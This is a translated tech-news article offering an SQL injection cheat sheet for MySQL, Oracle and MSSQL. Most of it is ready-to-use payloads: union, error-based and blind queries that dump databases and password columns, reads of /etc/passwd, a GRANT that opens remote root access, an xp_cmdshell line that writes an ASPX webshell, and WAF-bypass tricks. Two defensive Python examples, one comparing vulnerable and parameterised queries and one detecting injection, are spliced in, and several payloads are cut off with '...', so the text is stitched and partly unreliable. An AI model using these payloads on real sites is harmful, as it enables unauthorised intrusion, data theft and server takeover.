SLTechnology News & Howtos > Network Security, updated 2025-01-14
Shulou (Shulou.com) 05/31 report
The editor shares with you what the types of SQL injection are. Most people do not know much about this, so the article is shared for your reference; I hope you learn a lot from it.
Preface
SQL injection attacks can be divided into visible injection, error injection and blind injection, according to how the application handles the content returned by the database.
Visible injection
The attacker reads what they want directly from the content of the returned page.
Error injection
The database query result is not displayed on the page, but the application prints database error messages to the page, so the attacker can construct a statement that triggers a database error and read the desired content out of the error message.
Blind injection
The query result cannot be observed on the page; the attacker infers what they want through database logic (true/false conditions) or by delaying the database's execution.
Manual injection of MySQL
Union injection
?id=1' order by 4--+
?id=0' union select 1,2,group_concat(password) from users--+
group_concat can be replaced with concat_ws(',', id, users, password)
?id=0' union select 1,2,3 from users limit ...
Error injection
1. floor()
select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a)
2. extractvalue()
select * from test where id=1 and (extractvalue(1, concat(0x7e, (select user()), 0x7e)))
3. updatexml()
select * from test where id=1 and (updatexml(1, concat(0x7e, (select user()), 0x7e), 1))
4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b))
5. multipoint()
select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b))
6. polygon()
select * from test where id=1 and polygon((select * from (select * from (select user()) a) b))
7. multipolygon()
select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b))
8. linestring()
select * from test where id=1 and linestring((select * from (select * from (select user()) a) b))
9. multilinestring()
select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b))
10. exp()
select * from test where id=1 and exp(~(select * from (select user()) a))
Dump database names: ?id=1' and updatexml(1, (select concat(0x7e, (schema_name), 0x7e) from information_schema.schemata limit 2,1), 1)--+
Dump table names: ?id=1' and updatexml(1, (select concat(0x7e, (table_name), 0x7e) from information_schema.tables where table_schema='security' limit 3), 1)--+
Dump column names: ?id=1' and updatexml(1, (select concat(0x7e, (column_name), 0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1), 1)--+
Dump data: ?id=1' and updatexml(1, (select concat(0x7e, password, 0x7e) from users limit 1), 1)--+
concat can also be placed outside: updatexml(1, concat(0x7e, (select password from users limit 1), 0x7e), 1)
Blind injection
Time-based blind injection
Common function: sleep()
String-slicing functions: substr, substring, left
ascii(), hex(): allow values to be encoded so that no quotation marks are needed.
Time-based blind injection generally also needs a conditional function.
if(expr1, expr2, expr3)
When expr1 is true, expr2 is returned; when it is false, expr3 is returned.
?id=1' and if(ascii(substr(database(),1,1))>115, ...
?id=1' and if((substr((select user()),1,1)='r'), sleep(5), 1)--+
Boolean-based blind injection
?id=1' and substr((select user()),1,1)='r'--+
?id=1' and IFNULL((substr((select user()),1,1)='r'), 0)--+   // if the first argument of IFNULL is NULL, the fallback value given as the second argument is returned; if it is not NULL, the first argument is returned
?id=1' and strcmp((substr((select user()),1,1)='r'), 1)--+   // STRCMP() returns 0 if the strings are identical, -1 if the first argument is smaller according to the current collation, and 1 otherwise
Insert injection
This kind of injection appears at registration forms, IP headers, message boards and other places where data is written to the database. Running sqlmap against such a point, for example, will generate a lot of junk data.
Test by inserting single quotes, double quotes and the escape character \ so that the statement fails to execute; if the insert or update fails, test further to determine whether injection is present.
Second-order injection and wide-byte injection
Second-order injection:
In SQL statements without single quotes, hexadecimal encoding is used so that no single quotation marks appear.
Wide-byte injection:
If the single quotation mark is escaped as \', MySQL encodes \ as %5c; in a wide-byte character set two bytes form one Chinese character, so prepending %df to %5c turns the pair into the Chinese character "Qing", which consumes the backslash and bypasses the escape.
Manual injection of Oracle
Union injection
?id=-1' union select user,null from dual--
?id=-1' union select version,null from ...--
?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=2)--
?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=2)--
... passwd from users--
?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--
Error injection
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%'))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--
Boolean-based blind injection
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--
?id=1' and 1=(select decode(substr(user,1,1),'... from dual)--
?id=1' and ascii(substr(user,1,1))>64--
Time-based blind injection
?id=1' and 1=(case when ascii(substr(user,1,1))>128 then DBMS_PIPE.RECEIVE_MESSAGE('...',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))>64 then DBMS_PIPE.RECEIVE_MESSAGE('...',5) else 1 end)--
Manual injection of SQL
Judge whether an injection point exists
Numeric injection
Append to the URL:
and 1=1
and 1=2
If the two responses differ, an injection point exists.
Example:
http://www.xxx.cn/news.php?p=1&id=4' returns an error
http://www.xxx.cn/news.php?p=1&id=4 and 1=1 returns normally
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 returns an error
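The probe sequence above (id=4', id=4 and 1=1, id=4 and 1=2) only tells the attacker something because the parameter is spliced into the SQL text. The following is an added example, not from the original article, that replays those three probes against a string-concatenating lookup and against a parameterised one, using an in-memory SQLite table as a stand-in for the news.php data (table contents constructed).

```python
import sqlite3

# Constructed stand-in for the news table behind news.php.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO news VALUES (?, ?)",
                 [(1, "first"), (4, "fourth"), (5, "fifth")])

PROBES = ["4'", "4 and 1=1", "4 and 1=2"]   # the three requests from the text


def lookup_concat(user_id: str):
    """Vulnerable: the id parameter is pasted into the SQL text, so
    'and 1=1' / 'and 1=2' become part of the WHERE clause and change
    what the query returns; a stray quote breaks the statement."""
    try:
        sql = f"SELECT title FROM news WHERE id={user_id}"
        return ("ok", [row[0] for row in conn.execute(sql)])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_param(user_id: str):
    """Fixed: the value is bound as a query parameter. It is compared to
    the id column as data and never parsed as SQL, so all three probes
    produce the same result (no rows, no error): no oracle for the attacker."""
    try:
        rows = conn.execute("SELECT title FROM news WHERE id=?", (user_id,))
        return ("ok", [row[0] for row in rows])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def probe(handler):
    """Replay the three probes against a handler and collect the outcomes."""
    return {p: handler(p) for p in PROBES}


def has_oracle(handler) -> bool:
    """True when the probes yield distinguishable responses, i.e. the
    differential that the detection procedure above relies on is present."""
    outcomes = probe(handler).values()
    return len({repr(o) for o in outcomes}) > 1


if __name__ == "__main__":
    for name, handler in [("concatenated", lookup_concat), ("parameterised", lookup_param)]:
        print(name, "oracle:", has_oracle(handler))
        for p, result in probe(handler).items():
            print(f"  id={p!r:<14} -> {result}")
```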
Character (string) injection
Append to the URL:
' and 1=1 and '1'='1
' and 1=2 and '1'='1
http://www.xxx.cn/news.php?p=1&id=4' returns an error
http://www.xxx.cn/news.php?p=1&id=4' and 1=1 and '1'='1 returns normally
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 and '1'='1 returns an error
Search injection
Enter in the search box:
' returns an error
x%' and 1=1 and '%'=' returns normally
x%' and 1=2 and '%'=' returns an error
Determine the number of fields
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 order by 26 returns normally
http://www.xxx.cn/news.php?p=1&id=4 order by 27 returns an error
It follows that the number of fields is 26.
Character type
http://www.xxx.cn/news.php?p=1&id=4' order by 26 # returns normally
http://www.xxx.cn/news.php?p=1&id=4' order by 27 # returns an error
It follows that the number of fields is 26.
Search type
x%' order by 26 # returns normally
x%' order by 27 # returns an error
It follows that the number of fields is 26.
Find the displayable fields
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,3,4,5,6,7,8,9....
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,3,4,5,6,7,8,9.... #
Search type
x%' and 1=2 union select 1,2,3,4,5,6,7,8,9.... #
Find the database name
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,database(),4,5,6,7,8,9....
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,database(),4,5,6,7,8,9.... #
Search type
x%' and 1=2 union select 1,2,database(),4,5,6,7,8,9.... #
Find the table names in the database
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9.... from information_schema.tables where table_schema='database name'
The database name can also be given in hexadecimal.
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9.... from information_schema.tables where table_schema='database name' #
The database name can also be given in hexadecimal.
Search type
x%' and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9.... from information_schema.tables where table_schema='database name' #
The database name can also be given in hexadecimal.
Find the column names in the table
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9.... from information_schema.columns where table_name='table name'
The table name can also be given in hexadecimal.
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9.... from information_schema.columns where table_name='table name' #
The table name can also be given in hexadecimal.
Search type
x%' and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9.... from information_schema.columns where table_name='table name' #
The table name can also be given in hexadecimal.
Find the data in the table
Numeric type
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9.... from table name
Character type
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9.... from table name #
Search type
x%' and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9.... from table name #
Show version: select version()
Show character set: select @@character_set_database
Show databases: show databases
Show tables: show tables
Show host name: select @@hostname
Show OS version: select @@version_compile_os
Show MySQL installation path: select @@basedir
Show data directory: select @@datadir
Show root password (hash): select User,Password from mysql.user
Open remote connections: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION
MySQL function abuse
MySQL provides the load_file() function for reading files quickly, but the file must be located on the database server, the path must be absolute, and root permission is required.
The SQL statement is: union select 1,load_file('/etc/passwd')...
In general some anti-injection filters do not allow single quotation marks, so the following statement can be used to bypass them:
union select 1,load_file(0x272F6574632F70617373776427),3,4,5 #
The path is converted to hexadecimal.
Manual injection of MSSQL
Unlike MySQL injection, which uses the displayed fields, MSSQL injection here relies on error injection: a malicious SQL statement is inserted that makes the query fail, and the information we want is shown in the resulting error.
Injection point:
www.xxx.cn/xxx/xxx.aspx?id=1
Query the database version
@@version: an MSSQL global variable holding the database version information.
Test statement:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and @@version>0
Note: "and @@version>0" can also be written as "and 0/@@version>0"
Error message:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP3) - 10.50.6000.34 (X64) Aug 19 2014 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1' to data type int. (d:\KfSite\kaifeng\2.asp)
Aspx Trojan (webshell):
http://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo ";'" > C:\inetpub\wwwroot\2.aspx'--
The principle: SQL Server supports stacked queries, cmd commands can be executed through xp_cmdshell, and a file can be written to disk with "echo content > file" in cmd.
Bypass WAF with hex encoding
At http://www.xxx.com/xxx/xxx.aspx?username=xxx, use "HEX Encoding" under Encoding in the Firefox hackbar tool to encode the string into usable hex, then inject it into the site with error injection.
Dump the database version
select convert(int,@@version)
After hex encoding: 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
Then inject it as follows:
http://www.xxx.com/xxx/xxx.aspx?username=xxx';dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 15:48:46 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 2010 (Build 7601: Service Pack 1) (Hypervisor)' to data type int.
Note the injection statement:
dEcLaRe @s vArChAr(8000) // declares a local variable @s of type varchar(8000)
sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 // assigns @s the hexadecimal encoding of "select convert(int,@@version)"
eXeC(@s) // calls exec() to execute the contents of @s
Dump the current database
select convert(int,db_name())
Dump the current user
select convert(int,User_Name())
Dump table names
select convert(int,(select top 1 name from abc[database name].sys.all_objects where type='U' AND is_ms_shipped=0))
select convert(int,(select top 1 name from abc[database name].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))
Dump column names
select convert(int,(select top 1 COLUMN_NAME from abc[database name].information_schema.columns where TABLE_NAME='CMS_Userinfo[table name]'))
select convert(int,(select top 1 COLUMN_NAME from abc[database name].information_schema.columns where TABLE_NAME='CMS_Userinfo[table name]' and COLUMN_NAME not in ('id')))
Dump data
select convert(int,(select top 1 username from CMS_Admin))
select convert(int,(select top 1 password from CMS_Admin))
SQL injection Q&A: some small points
1. If id-1 returns the normal page, it indicates injection; is +1 OK as well? (www.test.com/xsn.php?id=12+1)
No, because the plus sign means a space in a URL.
2. Do you know how many kinds of comments MySQL has?
Three: ① # comments to the end of the line; ② /* multi-line comment */; ③ -- + comments to the end of the line.
The third kind needs explaining, because I didn't know this method before. I vaguely knew that '--' is a comment, but '-- +' confused me. It is actually '-- ', note the space after it. But in a URL, a literal space is discarded by the browser and never reaches the database, so the plus sign is used instead.
3. Can "select select * from admin" be executed? If not, explain why.
It cannot. When nesting a second select, the inner one must be enclosed in parentheses, otherwise it is invalid.
4. If spaces are filtered, do you know what can bypass the filter, i.e. what can replace a space? Whitespace characters: for example, un%0aion will be treated as union. If the space is filtered, the SQL statement may become: select from messages where uid=45or1=1, so we can use /**/ to replace the space: http://www.xxx.com/index.php?id=45/**/or/**/1=1. Others: %09, %0A, %0D, +, /**/, %20 etc. can all replace spaces.
5. What permissions does an Oracle database run with under Windows? Under Windows, Oracle must run with SYSTEM privileges.
6. What is the difference between SQL injection and SQL blind injection?
In conventional SQL injection, the application returns the data from the database and presents it to you, while in a blind SQL injection vulnerability you only get two different responses, corresponding to the true or false condition in the injection. The application returns different values for true and false conditions, but the attacker cannot retrieve the query results directly.
7. What is the main cause of SQL injection vulnerabilities?
Web applications that do not fully validate user-supplied data and do not encode output are the main cause.
8. What is a stacked query?
Whether multiple queries can be executed in sequence over a single database connection, i.e. whether stacked queries are allowed, is one of the important factors in whether a SQL injection vulnerability can be exploited.
In MySQL, SELECT * FROM members; DROP members; can be executed, so the database supports stacked queries, but the SQL statements PHP executes do not necessarily allow stacking.
9. What does /*! ... */ mean?
This is unique to MySQL: if an exclamation mark followed by a database version number is added at the start of a comment, the comment is parsed as code, and as long as the database version is higher than or equal to the version given in the comment, the code is executed.
select 1 /*!40119 +1*/
Query result:
Returns 2 (MySQL version 4.01.19 or higher)
Returns 1 (otherwise)
10. What if '=' in the injection statement is filtered?
Consider using the like keyword instead: union select password from users where username like admin
11. What if spaces are filtered? Consider using '/**/' instead:
union/**/select/**/password/**/from/**/users/**/where/**/username/**/like/**/admin
Note that if keywords are filtered, in MySQL you can also use inline comments inside keywords to bypass:
uni/**/on/**/sel/**/ect/**/password/**/fr/**/om/**/users/**/wh/**/ere/**/username/**/like/**/admin
12. '+' in SQL injection?
MSSQL: in MSSQL, the "+" operator is used for both string concatenation and addition.
MySQL: in MySQL, the "+" operator is only used for addition.
Oracle: in Oracle, the "+" operator is only used for addition.
13. String concatenation operators in the databases?
MSSQL: 'a'+'b'='ab'
MySQL: 'a' 'b'='ab'
Oracle: 'a'||'b'='ab'
14. Comment characters
MSSQL: '--' (note the space after it), '/*...*/'
MySQL: '--', '#', '/*...*/'; note that '--' must be followed by one or more spaces.
Oracle: '--', '/*...*/'
Among the three databases, the common comment character is '--'.
WAF bypass
Bypass at the rule level
SQL comment bypass
union/**/select
union/*aaaabbs*/select
union/*aaaaaaaaaaaaaaaaaaaaaaaaaaaa*/select
Inline comment: /*!xxxx*/
Whitespace bypass:
MySQL whitespace: %09, %0A, %0B, %0D, %20, %0C, %A0, /*xxx*/
Regular whitespace: %09, %0A, %0B, %0D, %20, etc.
Example 1: union%250Cselect
Example 2: union%25A0select
Function separators:
concat%2520(
concat/**/(
concat%250c(
concat%25a0(
Floating-point lexical analysis:
select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
Error-based SQL injection:
Error-based SQL injection functions are very easy to overlook:
extractvalue(select*from(select*from(select@@version)f)), polygon((select*from(select name_const(version(),1) ..., linestring(), multipoint(), multilinestring(), multipolygon()
MySQL special syntax
select {x table_name} from {x information_schema.tables}
Every checkpoint has a way around it.
Taking comment bypass as an example, start fuzzing
Comment character bypass:
* First test the most basic form: union/**/select
* Then introduce a special word in the middle: union/*aaaabbs*/select
* Finally test the comment length: union/*aaaaaaaaaaaaaaaaaaaaaaa*/select
The most basic model:
union/*something*/select
Case bypass
If keyword filtering is set up in the program but the filter does not analyse the composition of the keyword in depth, it only filters the keyword as a whole.
For example, filtering "and": this kind of filter only looks for the keyword and does not normalize it, so it can be bypassed by changing the case of letters inside the keyword.
Conventional bypass means
Double-write bypass
If the program detects a keyword and replaces it with an empty string, the SQL injection will not happen as written. Double-write bypass can be used against such a filtering strategy, because the replacement is performed only once during filtering.
For example: once "union" is found it is replaced with an empty string regardless of case. The filter can be bypassed by writing the keyword doubled: uniunionon.
Encoding bypass
Online URL encoding tools can be used to bypass the filtering mechanism of SQL injection.
http://tool.chinaz.com/Tools/urlencode.aspx
Inline comment bypass
Content inside inline comments in MySQL is executed as SQL.
Bypass SQL injection filters for and and or
Some features of MySQL:
1. MySQL keywords are case-insensitive; uppercase and lowercase are the same.
2. Hexadecimal and URL encoding in MySQL.
3. Replace and/or with symbols: and --> &&, or --> ||
4. Inline comments and multi-line comments: /*! inline comment */, /* multi-line comment */.
5. URL- and hex-encoded content is automatically recognised in MySQL.
Bypass strategy:
1. Case variation: or, OR, oR, Or, and, And, AND, aND, etc.
2. Add comments to the two sensitive words, such as a/**/and, or double-write them: oorr
3. Replace with symbols: and --> &&, or --> ||
Bypass SQL injection filters for spaces
Encoding: hex, urlencode
Space URL encodings:
%0a: line feed (new row)
form feed (new page)
%0d: carriage return
TAB key (vertical tab)
sqlmap security check:
sqlmap -u "URL" --hex --dbs --batch
Bypass SQL injection filters for union and select
Encode with %0a, add /**/ characters, vary the case of union/select, double-write, etc.
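A defender's counterpart to the bypass list above: this added example (not from the original article) normalises a request's query string, undoing the double URL-encoding, %0A/%0C/%A0 whitespace, /**/ and /*!...*/ comment and case tricks described in this section, before matching the union-, time- and error-based patterns. The sample requests and signature names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings modelled on the bypasses listed above
# (not captured from any real site).
SAMPLE_REQUESTS = [
    "id=4",                                          # benign
    "q=union+station+timetable",                     # benign, contains "union"
    "id=4%20union%20select%201,2,3",                 # plain union, no evasion
    "id=4/**/UnIoN/*aaaabbs*/SeLeCt/**/1,2,3",       # comment + case bypass
    "id=4%250Aunion%250Cselect%201",                 # double-encoded %0A / %0C
    "id=4%25A0union%25a0select%201",                 # double-encoded %A0 (NBSP)
    "id=8E0union%20select%201,2,3",                  # floating-point lexical trick
    "id=1/*!50000union*/select%201,2,3",             # versioned inline comment
    "id=1'%20and%20if(1,sleep(5),1)--+",             # time-based blind probe
    "id=1'%20and%20updatexml(1,concat(0x7e,user()),1)--+",  # error-based probe
]

# /*!NNNNN body*/ is executed by MySQL, so keep its body; plain /*...*/ is a separator.
VERSION_COMMENT_RE = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# The MySQL whitespace set quoted above: %09-%0D, %20 and %A0.
WHITESPACE_RE = re.compile(r"[\t\n\x0b\x0c\r \xa0]+")

SIGNATURES = {
    "union-based": re.compile(r"union(?:\s+all)?\s+select"),
    "time-based blind": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error-based": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
}


def normalize(raw: str) -> str:
    """Undo the evasions before matching: repeated URL decoding ('+' as space,
    latin-1 so a lone %A0 survives), comment handling, whitespace collapsing
    and case folding."""
    text = raw
    for _ in range(3):                       # %2520 -> %20 -> ' ' needs two rounds
        decoded = unquote_plus(text, encoding="latin-1")
        if decoded == text:
            break
        text = decoded
    text = VERSION_COMMENT_RE.sub(r" \1 ", text)
    text = PLAIN_COMMENT_RE.sub(" ", text)
    text = WHITESPACE_RE.sub(" ", text)
    return text.lower().strip()


def classify(raw: str) -> list[str]:
    """Return the names of the injection classes whose pattern matches."""
    norm = normalize(raw)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(norm)]


def scan(requests):
    """Map each raw request to its matched classes (empty list = no match)."""
    return {req: classify(req) for req in requests}


if __name__ == "__main__":
    for req, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{req:<55} -> {hits or 'clean'}")
```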
That is all the content of the article "What are the SQL injection types?" Thank you for reading! I believe everyone now has some understanding of it; I hope the content shared is helpful, and if you want to learn more, you are welcome to follow the industry information channel!